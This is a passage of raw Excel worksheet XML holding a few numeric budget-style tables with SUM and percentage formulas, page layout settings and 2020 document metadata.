      </c>
      <c r="B25" s="253">
        <v>65210</v>
      </c>
      <c r="C25" s="265">
        <v>32649</v>
      </c>
      <c r="D25" s="263">
        <f t="shared" si="0"/>
        <v>50.067474313755554</v>
      </c>
      <c r="E25" s="263">
        <f t="shared" si="1"/>
        <v>75.05689785972092</v>
      </c>
      <c r="F25" s="254">
        <v>43499</v>
      </c>
      <c r="G25" s="13"/>
    </row>
    <row r="26" spans="1:7" ht="25.5" customHeight="1">
      <c r="A26" s="215" t="s">
        <v>328</v>
      </c>
      <c r="B26" s="253">
        <v>961333</v>
      </c>
      <c r="C26" s="265">
        <v>781459</v>
      </c>
      <c r="D26" s="263">
        <f t="shared" si="0"/>
        <v>81.28910585613934</v>
      </c>
      <c r="E26" s="263">
        <f t="shared" si="1"/>
        <v>163.15303785390827</v>
      </c>
      <c r="F26" s="243">
        <v>478973</v>
      </c>
      <c r="G26" s="269"/>
    </row>
    <row r="27" spans="1:7" ht="25.5" customHeight="1">
      <c r="A27" s="239" t="s">
        <v>329</v>
      </c>
      <c r="B27" s="253">
        <v>501169</v>
      </c>
      <c r="C27" s="265">
        <v>377972</v>
      </c>
      <c r="D27" s="263">
        <f t="shared" si="0"/>
        <v>75.41807254638655</v>
      </c>
      <c r="E27" s="263">
        <f t="shared" si="1"/>
        <v>99.13343614599398</v>
      </c>
      <c r="F27" s="243">
        <v>381276</v>
      </c>
      <c r="G27" s="269"/>
    </row>
    <row r="28" spans="1:7" ht="25.5" customHeight="1">
      <c r="A28" s="13" t="s">
        <v>330</v>
      </c>
      <c r="B28" s="241">
        <v>55559</v>
      </c>
      <c r="C28" s="241">
        <v>52495</v>
      </c>
      <c r="D28" s="263">
        <f t="shared" si="0"/>
        <v>94.48514192120089</v>
      </c>
      <c r="E28" s="263">
        <f t="shared" si="1"/>
        <v>5662.891046386192</v>
      </c>
      <c r="F28" s="243">
        <v>927</v>
      </c>
      <c r="G28" s="232" t="s">
        <v>320</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:G1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.94" header="0.51" footer="0.47"/>
  <pageSetup firstPageNumber="3" useFirstPageNumber="1" fitToHeight="0" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>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dimension ref="A1:J25"/>
  <sheetViews>
    <sheetView showGridLines="0" showZeros="0" workbookViewId="0" topLeftCell="A1">
      <pane xSplit="1" ySplit="3" topLeftCell="B4" activePane="bottomRight" state="frozen"/>
      <selection pane="bottomRight" activeCell="A24" sqref="A24"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="41.375" style="246" customWidth="1"/>
    <col min="2" max="2" width="9.875" style="246" customWidth="1"/>
    <col min="3" max="3" width="9.75390625" style="246" customWidth="1"/>
    <col min="4" max="4" width="10.75390625" style="246" customWidth="1"/>
    <col min="5" max="5" width="11.875" style="246" customWidth="1"/>
    <col min="6" max="6" width="8.375" style="247" hidden="1" customWidth="1"/>
    <col min="7" max="7" width="37.00390625" style="246" customWidth="1"/>
    <col min="8" max="16384" width="9.00390625" style="246" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="28.5">
      <c r="A1" s="248" t="s">
        <v>331</v>
      </c>
      <c r="B1" s="248"/>
      <c r="C1" s="248"/>
      <c r="D1" s="248"/>
      <c r="E1" s="248"/>
      <c r="F1" s="248"/>
      <c r="G1" s="248"/>
    </row>
    <row r="2" spans="1:7" ht="18" customHeight="1">
      <c r="A2" s="207" t="s">
        <v>332</v>
      </c>
      <c r="B2" s="249"/>
      <c r="C2" s="250"/>
      <c r="D2" s="249"/>
      <c r="E2" s="249"/>
      <c r="F2" s="251"/>
      <c r="G2" s="192" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="3" spans="1:7" s="245" customFormat="1" ht="55.5" customHeight="1">
      <c r="A3" s="12" t="s">
        <v>260</v>
      </c>
      <c r="B3" s="12" t="s">
        <v>261</v>
      </c>
      <c r="C3" s="12" t="s">
        <v>262</v>
      </c>
      <c r="D3" s="12" t="s">
        <v>263</v>
      </c>
      <c r="E3" s="12" t="s">
        <v>264</v>
      </c>
      <c r="F3" s="12" t="s">
        <v>333</v>
      </c>
      <c r="G3" s="12" t="s">
        <v>266</v>
      </c>
    </row>
    <row r="4" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A4" s="13" t="s">
        <v>267</v>
      </c>
      <c r="B4" s="220">
        <f>SUM(B5,B14)</f>
        <v>194506</v>
      </c>
      <c r="C4" s="220">
        <f>SUM(C5,C14)</f>
        <v>184489</v>
      </c>
      <c r="D4" s="217">
        <f>C4/B4*100</f>
        <v>94.8500303332545</v>
      </c>
      <c r="E4" s="217">
        <f>C4/F4*100</f>
        <v>93.54619530770674</v>
      </c>
      <c r="F4" s="221">
        <v>197217</v>
      </c>
      <c r="G4" s="252"/>
    </row>
    <row r="5" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A5" s="17" t="s">
        <v>268</v>
      </c>
      <c r="B5" s="220">
        <f>SUM(B6:B13)</f>
        <v>138007</v>
      </c>
      <c r="C5" s="220">
        <f>SUM(C6:C13)</f>
        <v>134034</v>
      </c>
      <c r="D5" s="217">
        <f aca="true" t="shared" si="0" ref="D5:D23">C5/B5*100</f>
        <v>97.12116052084315</v>
      </c>
      <c r="E5" s="217">
        <f aca="true" t="shared" si="1" ref="E5:E14">C5/F5*100</f>
        <v>111.77976632279479</v>
      </c>
      <c r="F5" s="221">
        <v>119909</v>
      </c>
      <c r="G5" s="252"/>
    </row>
    <row r="6" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A6" s="17" t="s">
        <v>269</v>
      </c>
      <c r="B6" s="220">
        <f>80679+12</f>
        <v>80691</v>
      </c>
      <c r="C6" s="253">
        <v>79043</v>
      </c>
      <c r="D6" s="217">
        <f t="shared" si="0"/>
        <v>97.95764087692555</v>
      </c>
      <c r="E6" s="217">
        <f t="shared" si="1"/>
        <v>113.88332588931954</v>
      </c>
      <c r="F6" s="254">
        <v>69407</v>
      </c>
      <c r="G6" s="20"/>
    </row>
    <row r="7" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A7" s="17" t="s">
        <v>270</v>
      </c>
      <c r="B7" s="220">
        <v>19816</v>
      </c>
      <c r="C7" s="193">
        <v>21512</v>
      </c>
      <c r="D7" s="217">
        <f t="shared" si="0"/>
        <v>108.55874041178846</v>
      </c>
      <c r="E7" s="217">
        <f t="shared" si="1"/>
        <v>140.62888148002878</v>
      </c>
      <c r="F7" s="255">
        <v>15297</v>
      </c>
      <c r="G7" s="252"/>
    </row>
    <row r="8" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A8" s="17" t="s">
        <v>334</v>
      </c>
      <c r="B8" s="220">
        <v>6091</v>
      </c>
      <c r="C8" s="193">
        <v>4694</v>
      </c>
      <c r="D8" s="217">
        <f t="shared" si="0"/>
        <v>77.06452142505336</v>
      </c>
      <c r="E8" s="217">
        <f t="shared" si="1"/>
        <v>75.73410777670216</v>
      </c>
      <c r="F8" s="255">
        <v>6198</v>
      </c>
      <c r="G8" s="252"/>
    </row>
    <row r="9" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A9" s="17" t="s">
        <v>335</v>
      </c>
      <c r="B9" s="220">
        <v>13066</v>
      </c>
      <c r="C9" s="193">
        <v>11842</v>
      </c>
      <c r="D9" s="217">
        <f t="shared" si="0"/>
        <v>90.63217511097506</v>
      </c>
      <c r="E9" s="217">
        <f t="shared" si="1"/>
        <v>105.52486187845305</v>
      </c>
      <c r="F9" s="255">
        <v>11222</v>
      </c>
      <c r="G9" s="252"/>
    </row>
    <row r="10" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A10" s="142" t="s">
        <v>336</v>
      </c>
      <c r="B10" s="220">
        <v>13123</v>
      </c>
      <c r="C10" s="193">
        <v>14033</v>
      </c>
      <c r="D10" s="217">
        <f t="shared" si="0"/>
        <v>106.93439000228607</v>
      </c>
      <c r="E10" s="217">
        <f t="shared" si="1"/>
        <v>111.58555979643765</v>
      </c>
      <c r="F10" s="255">
        <v>12576</v>
      </c>
      <c r="G10" s="252"/>
    </row>
    <row r="11" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A11" s="142" t="s">
        <v>337</v>
      </c>
      <c r="B11" s="220">
        <v>3000</v>
      </c>
      <c r="C11" s="193">
        <v>341</v>
      </c>
      <c r="D11" s="217">
        <f t="shared" si="0"/>
        <v>11.366666666666667</v>
      </c>
      <c r="E11" s="217">
        <f t="shared" si="1"/>
        <v>12.152530292230935</v>
      </c>
      <c r="F11" s="255">
        <v>2806</v>
      </c>
      <c r="G11" s="20"/>
    </row>
    <row r="12" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A12" s="142" t="s">
        <v>338</v>
      </c>
      <c r="B12" s="220">
        <v>2220</v>
      </c>
      <c r="C12" s="193">
        <v>2569</v>
      </c>
      <c r="D12" s="217">
        <f t="shared" si="0"/>
        <v>115.72072072072072</v>
      </c>
      <c r="E12" s="217"/>
      <c r="F12" s="255">
        <v>2113</v>
      </c>
      <c r="G12" s="20"/>
    </row>
    <row r="13" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A13" s="17" t="s">
        <v>339</v>
      </c>
      <c r="B13" s="220"/>
      <c r="C13" s="193"/>
      <c r="D13" s="217"/>
      <c r="E13" s="217"/>
      <c r="F13" s="255">
        <v>290</v>
      </c>
      <c r="G13" s="20"/>
    </row>
    <row r="14" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A14" s="17" t="s">
        <v>285</v>
      </c>
      <c r="B14" s="220">
        <f>SUM(B15:B20)</f>
        <v>56499</v>
      </c>
      <c r="C14" s="220">
        <f>SUM(C15:C20)</f>
        <v>50455</v>
      </c>
      <c r="D14" s="217">
        <f t="shared" si="0"/>
        <v>89.30246553036338</v>
      </c>
      <c r="E14" s="217">
        <f t="shared" si="1"/>
        <v>65.26491436850003</v>
      </c>
      <c r="F14" s="255">
        <v>77308</v>
      </c>
      <c r="G14" s="252"/>
    </row>
    <row r="15" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A15" s="17" t="s">
        <v>340</v>
      </c>
      <c r="B15" s="220">
        <v>3500</v>
      </c>
      <c r="C15" s="193">
        <v>3826</v>
      </c>
      <c r="D15" s="217">
        <f t="shared" si="0"/>
        <v>109.31428571428572</v>
      </c>
      <c r="E15" s="217">
        <f aca="true" t="shared" si="2" ref="E15:E22">C15/F15*100</f>
        <v>108.72406933788008</v>
      </c>
      <c r="F15" s="255">
        <v>3519</v>
      </c>
      <c r="G15" s="256"/>
    </row>
    <row r="16" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A16" s="17" t="s">
        <v>341</v>
      </c>
      <c r="B16" s="220">
        <v>29986</v>
      </c>
      <c r="C16" s="193">
        <v>15131</v>
      </c>
      <c r="D16" s="217">
        <f t="shared" si="0"/>
        <v>50.46021476689122</v>
      </c>
      <c r="E16" s="217">
        <f t="shared" si="2"/>
        <v>40.62995086061062</v>
      </c>
      <c r="F16" s="255">
        <v>37241</v>
      </c>
      <c r="G16" s="257"/>
    </row>
    <row r="17" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A17" s="17" t="s">
        <v>342</v>
      </c>
      <c r="B17" s="220">
        <v>5249</v>
      </c>
      <c r="C17" s="193">
        <v>9494</v>
      </c>
      <c r="D17" s="217">
        <f t="shared" si="0"/>
        <v>180.87254715183846</v>
      </c>
      <c r="E17" s="217">
        <f t="shared" si="2"/>
        <v>163.83088869715272</v>
      </c>
      <c r="F17" s="255">
        <v>5795</v>
      </c>
      <c r="G17" s="257"/>
    </row>
    <row r="18" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A18" s="175" t="s">
        <v>343</v>
      </c>
      <c r="B18" s="220">
        <v>11540</v>
      </c>
      <c r="C18" s="193">
        <v>8822</v>
      </c>
      <c r="D18" s="217">
        <f t="shared" si="0"/>
        <v>76.4471403812825</v>
      </c>
      <c r="E18" s="217">
        <f t="shared" si="2"/>
        <v>64.15533415751582</v>
      </c>
      <c r="F18" s="255">
        <v>13751</v>
      </c>
      <c r="G18" s="257"/>
    </row>
    <row r="19" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A19" s="175" t="s">
        <v>344</v>
      </c>
      <c r="B19" s="220">
        <v>3674</v>
      </c>
      <c r="C19" s="193">
        <v>7996</v>
      </c>
      <c r="D19" s="217">
        <f t="shared" si="0"/>
        <v>217.63745236799127</v>
      </c>
      <c r="E19" s="217">
        <f t="shared" si="2"/>
        <v>110.44198895027624</v>
      </c>
      <c r="F19" s="255">
        <v>7240</v>
      </c>
      <c r="G19" s="257"/>
    </row>
    <row r="20" spans="1:7" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A20" s="17" t="s">
        <v>345</v>
      </c>
      <c r="B20" s="220">
        <v>2550</v>
      </c>
      <c r="C20" s="220">
        <v>5186</v>
      </c>
      <c r="D20" s="217">
        <f t="shared" si="0"/>
        <v>203.37254901960785</v>
      </c>
      <c r="E20" s="217">
        <f t="shared" si="2"/>
        <v>53.124359762343786</v>
      </c>
      <c r="F20" s="221">
        <v>9762</v>
      </c>
      <c r="G20" s="257"/>
    </row>
    <row r="21" spans="1:10" s="204" customFormat="1" ht="26.25" customHeight="1">
      <c r="A21" s="13" t="s">
        <v>292</v>
      </c>
      <c r="B21" s="220">
        <v>97950</v>
      </c>
      <c r="C21" s="220">
        <v>174917</v>
      </c>
      <c r="D21" s="217">
        <f t="shared" si="0"/>
        <v>178.57784583971414</v>
      </c>
      <c r="E21" s="217">
        <f t="shared" si="2"/>
        <v>143.6890571989518</v>
      </c>
      <c r="F21" s="221">
        <v>121733</v>
      </c>
      <c r="G21" s="256"/>
      <c r="J21" s="260"/>
    </row>
    <row r="22" spans="1:7" ht="26.25" customHeight="1">
      <c r="A22" s="258" t="s">
        <v>346</v>
      </c>
      <c r="B22" s="220">
        <v>84000</v>
      </c>
      <c r="C22" s="193">
        <v>136420</v>
      </c>
      <c r="D22" s="217">
        <f t="shared" si="0"/>
        <v>162.4047619047619</v>
      </c>
      <c r="E22" s="217">
        <f t="shared" si="2"/>
        <v>134.74112557533138</v>
      </c>
      <c r="F22" s="255">
        <v>101246</v>
      </c>
      <c r="G22" s="186"/>
    </row>
    <row r="23" spans="1:7" ht="26.25" customHeight="1">
      <c r="A23" s="13" t="s">
        <v>295</v>
      </c>
      <c r="B23" s="241">
        <v>2000</v>
      </c>
      <c r="C23" s="241">
        <v>2000</v>
      </c>
      <c r="D23" s="217">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="E23" s="217"/>
      <c r="F23" s="255"/>
      <c r="G23" s="13"/>
    </row>
    <row r="24" ht="19.5" customHeight="1"/>
    <row r="25" ht="19.5" customHeight="1">
      <c r="E25" s="259"/>
    </row>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sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:G1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.51" footer="0.47"/>
  <pageSetup firstPageNumber="5" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>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sxsczt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wei zhi hua</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>微软用户</cp:lastModifiedBy>
  <cp:lastPrinted>2020-04-23T08:25:36Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2001-01-20T09:20:13Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-25T02:22:04Z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2052-10.8.0.5715</vt:lpwstr>
  </property>
</Properties>
</file>